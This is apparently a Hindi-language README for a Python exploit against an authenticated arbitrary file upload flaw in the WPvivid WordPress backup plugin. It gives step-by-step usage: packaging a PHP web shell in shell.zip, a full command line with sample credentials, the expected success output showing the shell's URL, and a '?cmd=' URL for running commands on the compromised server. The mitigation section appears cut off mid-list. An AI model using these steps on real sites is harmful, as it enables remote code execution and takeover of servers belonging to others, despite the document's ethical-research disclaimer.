
प्रकाशित: 2024-10-16 | माइग्रेशन, बैकअप, स्टेजिंग – WPvivid <= 0.9.35 - प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोड
WPvivid WordPress प्लगइन, जो साइट माइग्रेशन और बैकअप के लिए डिज़ाइन किया गया है, एक मनमाना फ़ाइल अपलोड दोष के प्रति संवेदनशील है। यह भेद्यता कम-स्तरीय विशेषाधिकारों वाले प्रमाणित उपयोगकर्ताओं को ZIP फ़ाइलें अपलोड और निकालने की अनुमति देती है, जिससे निकाली गई फ़ाइलों के भीतर एक दुर्भावनापूर्ण स्क्रिप्ट तैनात होने पर संभावित रूप से रिमोट कोड निष्पादन (RCE) हो सकता है।
इस भेद्यता का फायदा उठाने के लिए निम्नलिखित पद्धति का उपयोग करते हुए एक Python एक्सप्लॉइट स्क्रिप्ट तैयार की गई है:
यदि एक्सप्लॉइटेशन सफल होता है, तो स्क्रिप्ट निम्न आउटपुट देगी:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
सुनिश्चित करें कि एक दुर्भावनापूर्ण shell.zip फ़ाइल एक्सप्लॉइट स्क्रिप्ट के समान निर्देशिका में मौजूद है।
shell.zip फ़ाइल में एक PHP वेब शेल (e.g., nxploit.php). होना चाहिए।
Subscriber या उच्च विशेषाधिकार वाला एक मान्य WordPress खाता आवश्यक है।
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
स्क्रिप्ट लक्ष्य का संस्करण जाँचेगी और प्रदान किए गए क्रेडेंशियल का उपयोग करके लॉग इन करेगी।
यदि लक्ष्य असुरक्षित है, तो स्क्रिप्ट shell.zip अपलोड करेगी और उसे निकालेगी।
यदि सफल होती है, तो स्क्रिप्ट अपलोड किए गए शेल का URL प्रदान करेगी।
एक बार शेल सफलतापूर्वक अपलोड और निकाल लिया जाने पर, आप URL के माध्यम से कमांड भेजकर उसके साथ इंटरैक्ट कर सकते हैं:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
इस भेद्यता को कम करने के लिए, निम्नलिखित उपायों को अपनाने की दृढ़ता से अनुशंसा की जाती है:
wp-content/uploads निर्देशिका में .htaccess या सर्वर कॉन्फ़िगरेशन का उपयोग करके।यह भेद्यता एक गंभीर जोखिम उत्पन्न करती है, क्योंकि यह प्रमाणित हमलावरों को WordPress सर्वर पर दुर्भावनापूर्ण फ़ाइलें अपलोड और निष्पादित करने में सक्षम बनाती है। साइट व्यवस्थापकों को अपने इंस्टॉलेशन को सुरक्षित करने के लिए तत्काल कार्रवाई करनी चाहिए।
अस्वीकरण: यह दस्तावेज़ केवल नैतिक सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के भेद्यताओं का शोषण करना अवैध है और लागू कानूनों के तहत दंडनीय है। ( Nxploit | Khaled_alenazi )